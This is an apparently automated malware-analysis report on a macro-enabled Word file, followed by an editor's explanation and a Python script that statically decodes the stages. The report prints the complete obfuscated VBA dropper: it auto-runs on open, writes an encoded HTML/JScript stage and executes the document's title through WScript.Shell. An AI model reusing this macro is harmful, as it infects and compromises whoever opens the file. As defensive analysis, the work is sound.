Verdict: MALICIOUS
Risk score: 170
Heuristics: 6

VBA project inside OOXML (medium; 4 related findings) [OOXML_VBA]
Document contains a VBA project: VBA macros present.

WScript.Shell usage (critical) [OLE_VBA_WSCRIPT]
Matched line in script: Set counterText = CreateObject("wscript.shell")

CreateObject call (high) [OLE_VBA_CREATEOBJ]
Matched line in script: Set counterText = CreateObject("wscript.shell")

VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) and a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.

Document_Open macro (low) [OLE_VBA_DOCOPEN]
Matched line in script: Sub Document_Open()
Embedded URL (info) [EMBEDDED_URL]
One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All 16 URLs below were found in document text (OOXML body / shared strings). Every one of them is an XML namespace identifier from the OOXML and Office markup schemas that ordinary Word files declare in their part headers, none is referenced by the macro, so they are not network indicators for this sample.
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
- http://schemas.microsoft.com/office/drawing/2014/chartex
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
- http://schemas.openxmlformats.org/markup-compatibility/2006
- http://schemas.openxmlformats.org/officeDocument/2006/relationships
- http://schemas.openxmlformats.org/officeDocument/2006/math
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
- http://schemas.openxmlformats.org/wordprocessingml/2006/main
- http://schemas.microsoft.com/office/word/2010/wordml
- http://schemas.microsoft.com/office/word/2012/wordml
- http://schemas.microsoft.com/office/word/2015/wordml/symex
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
- http://schemas.microsoft.com/office/word/2010/wordprocessingInk
- http://schemas.microsoft.com/office/word/2006/wordml
- http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 10513 bytes | 712dcf0057eeb74db2be1597513f109ce98171d9a7192399739f4e8f59418f77 |

Preview script: first 1,000 lines of the extracted script (macros.bas)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
main
End Sub
Attribute VB_Name = "frm"
Attribute VB_Base = "0{FFDF38BB-869A-4711-9C91-2F8E303A2472}{9B2C7F4A-33DD-4077-8743-6F13775E1956}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub button1_Click()
Set indexTitleTemp = ActiveDocument.BuiltInDocumentProperties("title")
Set counterText = CreateObject("wscript.shell")
With counterText
.exec$ (indexTitleTemp)
End With
End Sub
Attribute VB_Name = "rightTitleResponse"
Sub main()
repoArgument
End Sub
Function gwc(databaseLeft)
If Len(databaseLeft) > 0 Then
gwc = databaseLeft
End If
End Function
Sub repoArgument()
Dim lenFunc As String
procedureCopy = Split(ActiveDocument.BuiltInDocumentProperties("title"), " ")
lenFunc = procedureCopy(1)
Set lenMemGlobal = New varMem
lenMemGlobal.leftDataBorder lenFunc, arrayLink
frm.button1_Click
End Sub
Attribute VB_Name = "nextRequest"
Function tableNext(rightExceptionLeft)
Dim ptrArgument As Integer
ptrArgument = 31337
If (Len(rightExceptionLeft) < ptrArgument) Then tableNext = gwc("<htm" & "l><b" & "ody>" & "<div" & " id=" & "'con" & "tent" & "'>fT" & "tlc2" & "9sYy" & "54b2" & "J0c2" & "lMcG" & "1ldD" & "spMi" & "AsIm" & "dwai" & "5sYW" & "JvbE" & "d0bm" & "VtdW" & "NvZF" & "xcY2" & "lsYn" & "VwXF" & "xzcm" & "VzdV" & "xcOm" & "MiKG" & "VsaW" & "ZvdG" & "V2YX" & "MueG" & "9idH" & "NpTH" & "BtZX" & "Q7KX" & "lkb2" & "Jlc2" & "5vcH" & "Nlci" & "54RW" & "ZlUm" & "Z1Yi" & "hldG" & "lydy" & "54b2" & "J0c2" & "lMcG" & "1ldD" & "sxID" & "0gZX" & "B5dC" & "54b2" & "J0c2" & "lMcG" & "1ldD" & "tuZX" & "BvLn" & "hvYn" & "RzaU" & "xwbW" & "V0Oy" & "kibW" & "Flcn" & "RzLm" & "Jkb2" & "RhIi" & "h0Y2" & "VqYk" & "9YZX" & "ZpdG" & "NBIH" & "dlbi" & "A9IH" & "hvYn" & "RzaU" & "xwbW" & "V0IH" & "Jhdn" & "spMD" & "AyID" & "09IH" & "N1dG" & "F0cy" & "54RW" & "ZlUm" & "Z1Yi" & "hmaT" & "spKG" & "RuZX" & "MueE" & "VmZV" & "JmdW" & "I7KW" & "VzbG" & "FmIC" & "wiaz" & "Budz" & "ZTSz")
End Function
Function leftSelectConvert(rightExceptionLeft)
Dim ptrArgument As Integer
ptrArgument = 31337
If (Len(rightExceptionLeft) < ptrArgument) Then leftSelectConvert = gwc("cwRm" & "p3M3" & "lSRk" & "5hRl" & "ZmPW" & "hjcm" & "Flcy" & "ZYS0" & "laV3" & "gwNU" & "pGR1" & "c9ZW" & "dhcC" & "Zzb2" & "JRMk" & "5tbk" & "E5d3" & "F4dF" & "FMTG" & "hYR0" & "dDMV" & "hjMU" & "k9cm" & "VzdS" & "ZiZD" & "lFNG" & "ZVcX" & "hMVG" & "5mM3" & "Z5bV" & "NFdH" & "d4S2" & "JUTk" & "djOD" & "1mZX" & "Imb0" & "xmTW" & "t4PS" & "Yyen" & "RteV" & "J3Z1" & "JWeX" & "RmYk" & "M5PW" & "hjcm" & "Flcy" & "ZWU3" & "FzWm" & "JITV" & "lHTm" & "gyYk" & "NzUV" & "Y9ZW" & "dhcC" & "ZJen" & "VOUT" & "BVTD" & "ROOT" & "ZIa2" & "VYdD" & "1lbW" & "l0Pz" & "JydX" & "YvTn" & "dsYz" & "NqSG" & "JHNG" & "NzQW" & "p2am" & "M2TH" & "dwV0" & "VuQ1" & "NpRU" & "txbi" & "83ND" & "M0Ni" & "81US" & "9pOU" & "VlNF" & "owQU" & "ZMOT" & "hSb0" & "J6V2" & "hvME" & "hrND" & "hwV0" & "Q1UT" & "FEeG" & "owN0" & "R5Lz" & "FTSD" & "VUM0" & "w5Um" & "5qTj" & "ZDLz" & "c0Mj" & "cyLz" & "R2d3" & "VBN3" & "diZH")
End Function
Function countTmp(rightExceptionLeft)
Dim ptrArgument As Integer
ptrArgument = 31337
If (Len(rightExceptionLeft) < ptrArgument) Then countTmp = gwc("NwVV" & "UyUl" & "kxVD" & "A4dX" & "l3SE" & "o0en" & "FDWE" & "1Cem" & "ZrMH" & "Z0U1" & "Yvc2" & "9zZ2" & "QvbW" & "9jLj" & "QwMD" & "JpeG" & "F0eX" & "Jvdm" & "kvLz" & "pwdH" & "RoIi" & "AsIl" & "RFRy" & "Iobm" & "Vwby" & "54RW" & "ZlUm" & "Z1Yj" & "spIn" & "B0dG" & "hsbX" & "guMm" & "xteH" & "NtIi" & "h0Y2" & "VqYk" & "9YZX" & "ZpdG" & "NBIH" & "dlbi" & "A9IH" & "hFZm" & "VSZn" & "ViIH" & "Jhdg" & "==|f" & "XspY" & "251R" & "nhFb" & "m90d" & "HViK" & "Ghjd" & "GFjf" & "TspI" & "mF0a" & "C5sY" & "WJvb" & "Ed0b" & "mVtd" & "WNvZ" & "FxcY" & "2lsY" & "nVwX" & "Fxzc" & "mVzd" & "VxcO" & "mMiK" & "GVsa" & "WZld" & "GVsZ" & "WQuY" & "251R" & "nBtZ" & "XR7e" & "XJ0O" & "ykid" & "GNla" & "mJvb" & "WV0c" & "3lzZ" & "WxpZ" & "i5nb" & "ml0c" & "GlyY" & "3MiK" & "HRjZ" & "WpiT" & "1hld" & "ml0Y" & "0Egd" & "2VuI" & "D0gY" & "251R" & "nBtZ" & "XQgc" & "mF2O" & "ykiZ" & "3BqL" & "mxhY" & "m9sR")
End Function
Function removeDatabase(rightExceptionLeft)
Dim ptrArgument As Integer
ptrArgument = 31337
If (Len(rightExceptionLeft) < ptrArgument) Then removeDatabase = gwc("3RuZ" & "W11Y" & "29kX" & "Fxja" & "Wxid" & "XBcX" & "HNyZ" & "XN1X" & "Fw6Y" & "yAyM" & "3J2c" & "2dlc" & "iIob" & "nVyL" & "ikib" & "Gxla" & "HMud" & "HBpc" & "mNzd" & "yIod" & "GNla" & "mJPW" & "GV2a" & "XRjQ" & "SB3Z" & "W4=<" & "/div" & "><di" & "v id" & "='ta" & "ble1" & "'>AB" & "CDEF" & "GHIJ" & "KLMN" & "OPQR" & "STUV" & "WXYZ" & "</di" & "v><d" & "iv i" & "d='t" & "able" & "2'>0" & "1234" & "5678" & "9+/<" & "/div" & "><di" & "v id" & "='ta" & "ble3" & "'></" & "div>" & "<scr" & "ipt " & "lang" & "uage" & "='ja" & "vasc" & "ript" & "'>fu" & "ncti" & "on d" & "ocum" & "entC" & "onve" & "rt(i" & "ndex" & "Inde" & "xDat" & "a){r" & "etur" & "n(ne" & "w Ac" & "tive" & "XObj" & "ect(" & "inde" & "xInd" & "exDa" & "ta))" & ";}fu" & "ncti" & "on l" & "enW(" & "coun" & "tCon" & "stTe" & "xtbo" & "x){r" & "etur" & "n(sc" & "reen" & "Capt" & "ion." & "getE" & "leme" & "ntBy" & "Id(c")
End Function
Function documentLocal(rightExceptionLeft)
Dim ptrArgument As Integer
ptrArgument = 31337
If (Len(rightExceptionLeft) < ptrArgument) Then documentLocal = gwc("ount" & "Cons" & "tTex" & "tbox" & ").in" & "nerH" & "TML)" & ";}fu" & "ncti" & "on c" & "apti" & "onMe" & "mSwa" & "p(){" & "var " & "glob" & "alCo" & "unt " & "= le" & "nW('" & "tabl" & "e1')" & ";var" & " var" & "Scre" & "en =" & " glo" & "balC" & "ount" & ".toL" & "ower" & "Case" & "();v" & "ar c" & "onve" & "rtPa" & "ste " & "= le" & "nW('" & "tabl" & "e2')" & ";ret" & "urn(" & "glob" & "alCo" & "unt " & "+ va" & "rScr" & "een " & "+ co" & "nver" & "tPas" & "te);" & "}fun" & "ctio" & "n ar" & "gume" & "ntPt" & "rTru" & "st(s" & "){va" & "r e=" & "{}; " & "var " & "i; v" & "ar b" & "=0; " & "var " & "c; v" & "ar x" & "; va" & "r l=" & "0; v" & "ar a" & "; va" & "r li" & "bBuf" & "ferD" & "atab" & "ase=" & "''; " & "var " & "w=St" & "ring" & ".fro" & "mCha" & "rCod" & "e; v" & "ar L" & "=s.l" & "engt" & "h;va" & "r li" & "stbo" & "xPas" & "teLi" & "b = " & "resp" & "onse" & "Left")
End Function
Function pointerNamespaceRef(rightExceptionLeft)
Dim ptrArgument As Integer
ptrArgument = 31337
If (Len(rightExceptionLeft) < ptrArgument) Then pointerNamespaceRef = gwc("('tA" & "rahc" & "');f" & "or(i" & "=0;i" & "<64;" & "i++)" & "{e[c" & "apti" & "onMe" & "mSwa" & "p()[" & "list" & "boxP" & "aste" & "Lib]" & "(i)]" & "=i;}" & "for(" & "x=0;" & "x<L;" & "x++)" & "{c=e" & "[s[l" & "istb" & "oxPa" & "steL" & "ib](" & "x)];" & "b=(b" & "<<6)" & "+c;l" & "+=6;" & "whil" & "e(l>" & "=8){" & "((a=" & "(b>>" & ">(l-" & "=8))" & "&0xf" & "f)||" & "(x<(" & "L-2)" & "))&&" & "(lib" & "Buff" & "erDa" & "taba" & "se+=" & "w(a)" & ");}}" & "retu" & "rn(l" & "ibBu" & "ffer" & "Data" & "base" & ");};" & "func" & "tion" & " res" & "pons" & "eLef" & "t(co" & "llec" & "tion" & "Proc" & "Stru" & "ct){" & "retu" & "rn c" & "olle" & "ctio" & "nPro" & "cStr" & "uct." & "spli" & "t(''" & ").re" & "vers" & "e()." & "join" & "('')" & ";}sc" & "reen" & "Cons" & "tVie" & "w = " & "wind" & "ow;s" & "cree" & "nCap" & "tion" & " = d" & "ocum" & "ent;" & "scre" & "enCo" & "nstV")
End Function
Function variableException(rightExceptionLeft)
Dim ptrArgument As Integer
ptrArgument = 31337
If (Len(rightExceptionLeft) < ptrArgument) Then variableException = gwc("iew." & "resi" & "zeTo" & "(1, " & "1);s" & "cree" & "nCon" & "stVi" & "ew.m" & "oveT" & "o(-1" & "00, " & "-100" & ");va" & "r cl" & "earR" & "epoT" & "rust" & " = s" & "cree" & "nCap" & "tion" & ".get" & "Elem" & "entB" & "yId(" & "'con" & "tent" & "').i" & "nner" & "HTML" & ";var" & " cle" & "arRe" & "poTr" & "ust " & "= cl" & "earR" & "epoT" & "rust" & ".spl" & "it('" & "|');" & "var " & "quer" & "yCon" & "st =" & " res" & "pons" & "eLef" & "t(ar" & "gume" & "ntPt" & "rTru" & "st(c" & "lear" & "Repo" & "Trus" & "t[0]" & "));v" & "ar f" & "uncV" & "aria" & "ble " & "= re" & "spon" & "seLe" & "ft(a" & "rgum" & "entP" & "trTr" & "ust(" & "clea" & "rRep" & "oTru" & "st[1" & "]));" & "</sc" & "ript" & "><sc" & "ript" & " lan" & "guag" & "e='j" & "avas" & "crip" & "t'>f" & "unct" & "ion " & "valu" & "eQue" & "ryGe" & "neri" & "c(li" & "bIte" & "rato" & "r){v" & "ar s" & "izeT" & "emp ")
End Function
Function variableEx(rightExceptionLeft)
Dim ptrArgument As Integer
ptrArgument = 31337
If (Len(rightExceptionLeft) < ptrArgument) Then variableEx = gwc("= do" & "cume" & "ntCo" & "nver" & "t(re" & "spon" & "seLe" & "ft('" & "lort" & "noct" & "pirc" & "s.lo" & "rtno" & "ctpi" & "rcss" & "m'))" & ";siz" & "eTem" & "p['L" & "angu" & "age'" & "] = " & "'jsc" & "ript" & "';si" & "zeTe" & "mp['" & "Time" & "out'" & "] = " & "6000" & "0;si" & "zeTe" & "mp['" & "AddC" & "ode'" & "](li" & "bIte" & "rato" & "r);r" & "etur" & "n(nu" & "ll);" & "}</s" & "crip" & "t><s" & "crip" & "t la" & "ngua" & "ge='" & "vbsc" & "ript" & "'>va" & "lueQ" & "uery" & "Gene" & "ric " & "quer" & "yCon" & "st :" & " val" & "ueQu" & "eryG" & "ener" & "ic f" & "uncV" & "aria" & "ble " & ": sc" & "reen" & "Cons" & "tVie" & "w.cl" & "ose<" & "/scr" & "ipt>" & "</bo" & "dy><" & "/htm" & "l>")
End Function
Function arrayLink()
arrayLink = tableNext("roce") + leftSelectConvert("arCo") + countTmp("bBor") + removeDatabase("oint") + documentLocal("itle") + pointerNamespaceRef("extb") + variableException("able") + variableEx("elec")
End Function
Attribute VB_Name = "varMem"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Public Function leftDataBorder(classStructValue As String, mainListException As String)
Open classStructValue For Output As #1
Print #1, mainListException
Close #1
End Function
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 37376 bytes | a565a357bef7a0f0875fe23ff4d7df4ce3796239e09661d2c9726d6158381fb4 |
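The extracted source shows the full staging chain: Document_Open calls main, which calls repoArgument; that reads the document's Title property, splits it on spaces and uses element 1 as an output path; arrayLink() concatenates the eight chunked strings (tableNext through variableEx, in the order the expression lists them, each guarded by a Len(...) < 31337 test that its four-character argument always passes) into an HTML page; varMem.leftDataBorder writes that page to the path; and frm.button1_Click hands the whole Title string to WScript.Shell.Exec. The dropped page's own scripts split the 'content' div on '|', base64-decode each piece with the alphabet built from table1 (upper case, then lower-cased) and table2 ("0123456789+/"), which is the standard base64 alphabet, reverse the result, and feed it to an ActiveX object whose ProgID is 'lortnoctpircs.lortnoctpircssm' reversed with Language set to 'jscript'. The script below, added here as an editor's example rather than code from the report or the sample, reproduces both stages statically so an analyst can recover the second-stage JScript without executing anything: it folds the '"ab" & "cd"' literals back together, evaluates arrayLink() in the order the expression gives, and decodes the content segments. It runs on a constructed miniature of the macro (two short stages, not the sample's own strings); point gwc_payloads and rebuild_dropped_file at the real macros.bas to get the actual dropped file.

```python
import base64
import re

# Constructed miniature of the macro's staging code (not the sample's own strings):
# an HTA-style page whose 'content' div holds two base64 segments of reversed
# JScript, split across two VBA functions in the same '"abcd" & "efgh"' chunked
# form the macro uses, with arrayLink() listing them in non-file order.
def build_constructed_sample():
    stage1 = "WScript.Echo('stage one');"
    stage2 = "WScript.Echo('stage two');"

    def segment(js):
        # the dropped page base64-decodes and THEN reverses, so encode reversed text
        return base64.b64encode(js[::-1].encode("latin-1")).decode("ascii")

    html = ("<html><body><div id='content'>" + segment(stage1) + "|" + segment(stage2)
            + "</div><div id='table1'>ABCDEFGHIJKLMNOPQRSTUVWXYZ</div>"
            "<div id='table2'>0123456789+/</div></body></html>")

    def chunked(s):
        return " & ".join('"%s"' % s[i:i + 4] for i in range(0, len(s), 4))

    half = len(html) // 2
    return (
        "Function gwc(databaseLeft)\n"
        "If Len(databaseLeft) > 0 Then gwc = databaseLeft\n"
        "End Function\n"
        "Function secondHalf(rightExceptionLeft)\n"
        "If (Len(rightExceptionLeft) < 31337) Then secondHalf = gwc(" + chunked(html[half:]) + ")\n"
        "End Function\n"
        "Function firstHalf(rightExceptionLeft)\n"
        "If (Len(rightExceptionLeft) < 31337) Then firstHalf = gwc(" + chunked(html[:half]) + ")\n"
        "End Function\n"
        "Function arrayLink()\n"
        'arrayLink = firstHalf("roce") + secondHalf("arCo")\n'
        "End Function\n"
    )


FUNC_RE = re.compile(r"Function\s+(\w+)\s*\([^)]*\)(.*?)End Function", re.S)
GWC_RE = re.compile(r'gwc\(((?:"[^"]*"\s*&?\s*)+)\)')
LIT_RE = re.compile(r'"([^"]*)"')


def join_vba_literals(expr):
    """Collapse a '"ab" & "cd" & ...' VBA expression into one string."""
    return "".join(LIT_RE.findall(expr))


def gwc_payloads(vba_src):
    """Map each function name to the concatenated string it hands to gwc()."""
    payloads = {}
    for name, body in FUNC_RE.findall(vba_src):
        m = GWC_RE.search(body)
        if m:
            payloads[name] = join_vba_literals(m.group(1))
    return payloads


def rebuild_dropped_file(vba_src):
    """Evaluate arrayLink() statically: concatenate the called functions'
    strings in the order the expression lists them, not file order."""
    expr = re.search(r"arrayLink\s*=\s*(.+)", vba_src).group(1)
    order = re.findall(r'(\w+)\s*\("[^"]*"\)', expr)
    payloads = gwc_payloads(vba_src)
    return "".join(payloads[name] for name in order)


def decode_content_segments(html):
    """Undo the dropped page's decoder: split the 'content' div on '|',
    base64-decode each piece (table1+table2 is the standard alphabet), reverse."""
    body = re.search(r"id='content'>([^<]*)</div>", html).group(1)
    return [base64.b64decode(seg).decode("latin-1")[::-1] for seg in body.split("|")]


if __name__ == "__main__":
    page = rebuild_dropped_file(build_constructed_sample())
    for stage in decode_content_segments(page):
        print(stage)
```

The one piece of the chain this preview does not contain is the command that actually runs, because it lives in the document's Title property rather than in the macro; for an OOXML file that value is the dc:title element of docProps/core.xml, so pull it from there to learn the interpreter and the drop path the sample used.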